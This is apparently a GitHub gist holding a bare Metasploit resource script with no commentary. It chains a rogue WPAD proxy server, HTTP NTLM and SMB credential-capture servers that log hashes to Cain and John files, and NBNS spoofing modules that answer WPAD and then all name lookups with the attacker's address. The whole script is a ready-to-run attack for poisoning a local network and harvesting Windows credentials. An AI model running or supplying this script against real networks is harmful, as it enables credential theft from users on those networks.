Created
July 24, 2015 09:07
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
use auxiliary/server/wpad | |
set PROXY x.x.x.x | |
run | |
use auxiliary/server/capture/http_ntlm | |
set CAINPWFILE /root/cain.http.pw | |
set JOHNPWFILE /root/john.http.pw | |
set URIPATH / | |
set SRVPORT 80 | |
run | |
use auxiliary/server/capture/smb | |
set CAINPWFILE /root/cain.smb.pw | |
set JOHNPWFILE /root/john.smb.pw | |
run | |
use auxiliary/spoof/nbns/nbns_response | |
set GATEWAY_PROBE_HOST x.x.x.1 | |
set SPOOFIP x.x.x.x | |
set REGEX WPAD.* | |
run | |
use auxiliary/spoof/nbns/nbns_response | |
set GATEWAY_PROBE_HOST x.x.x.1 | |
set SPOOFIP x.x.x.x | |
set REGEX .* | |
run |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment